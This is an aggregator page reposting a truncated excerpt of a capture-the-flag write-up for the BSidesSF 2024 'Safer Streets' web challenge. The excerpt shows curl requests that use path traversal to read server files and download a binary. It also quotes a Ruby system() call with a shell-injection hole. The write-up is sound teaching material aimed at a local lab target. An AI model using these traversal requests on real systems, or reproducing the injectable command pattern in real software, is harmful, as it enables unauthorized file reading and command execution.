SOC News: Article

One Article Review

Accueil - L'article:

Source	SkullSecurity
Identifiant	8504963
Date de publication	2024-05-05 19:59:54 (vue: 2024-05-22 20:06:52)
Titre	BSidesSF 2024 Writeups: Safer Streets (Web / reversing)
Texte	This is a write-up for Safer Streets. I apparently wrote this in more “note to self” style, not blog style, so enjoy! First, browse the application. You should be able to create an error: $ curl \'http://localhost:8080/display?name=test\' Error in script /app/server.rb: No such file or directory @ rb_sysopen - /app/data/test Note that has a image/jpeg content-type, so it might confuse the browser. That issue grants access to two primitives: a) Read any file via path traversal b) The full path to the server For example: $ curl -s \'http://localhost:8080/display?name=../server.rb\' \| head -n20 require \'json\' require \'sinatra\' require \'pp\' require \'singlogger\' require \'open3\' ::SingLogger.set_level_from_string(level: ENV[\'log_level\'] \|\| \'debug\') LOGGER = ::SingLogger.instance() # Ideally, we set all these in the Dockerfile set :bind, ENV[\'HOST\'] \|\| \'0.0.0.0\' set :port, ENV[\'PORT\'] \|\| \'8080\' SAFER_STREETS_PATH = ENV[\'SAFER_STREETS\'] \|\| \'/app/safer-streets\' SCRIPT = File.expand_path(__FILE__) LOGGER.info("Checking for required binaries...") if File.exist?(SAFER_STREETS_PATH) LOGGER.info("* Found `safer-streets` binary: #{ SAFER_STREETS_PATH }") [...] You can grab the safer-streets binary as well: $ curl -s \'http://localhost:8080/display?name=../../../app/safer-streets\' \| file - /dev/stdin: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=fa512a55e0fbc8c4ad80483379826183f29ce161, for GNU/Linux 3.2.0, with debug_info, not stripped Inspecting the Ruby code shows an shell-injection issue if you control the output of safer-streets: system("/usr/bin/report-infraction --node=\'#{result[\'node\']}\' --img=\'#{photo}\'") You can reverse or mess with the binary to dis
Notes	★★★★
Envoyé	Oui
Condensat	+8+8 /app/data/test /app/safer /app/server /code128png /combined /dev/stdin: /exploit /home/ctf/print /lib64/ld /safer /server /tmp/flag /usr/bin/report 0123456789104 0123456789104test 0123456789104testcode128 128 176 1x2 200 2024 52d11b6dba5e 8080 ::singlogger :bind :port =fa512a55e0fbc8c4ad80483379826183f29ce161 `safer able above access actually add all also any apparently application barcode barcodes best bigger binaries binary binary: bit blog browse browser bsidessf buildid but can check checking code code128 code: codes combined concatenated confuse content continue; control create ctf curl data debug decode directory discover dockerfile dynamically ean elf enjoy env error error: example: executable exist exit expand exploit extra faulty; field: file first flag flag: found fprintf from full generated geometry get gnu/linux grab grants grayscale has have having head here hinted host http://localhost:8080/display http://localhost:8080/upload ideally image image/jpeg images img= info infraction injection inspecting instance interlaced interpreter invalid issue it: json len length level level: linked linux log logger logic looking loop lsb means mentioned mess might mogrify montage more multiple n20 name name= name=test needs next node node= non not note one open3 ourselves output outside parameter: parsing: partial path payload: photo photo=@ pie plate png png: port preview primitives: printf rb: read require required resize result reverse reversing ruby safer script self” server set sha1 shell should show shows sinatra singlogger some speed stderr strcmp streets streets: streets` string stripped style submit such sym sym; symbol sysopen system sysv technique test then these they tile traversal tried two txt txt; typ type type: unsigned upc using version web well: which will won work write writeups: wrote x200 x86 your zbar “note
Tags	Threat Technical
Stories
Move

L'article ne semble pas avoir été repris aprés sa publication.

L'article ne semble pas avoir été repris sur un précédent.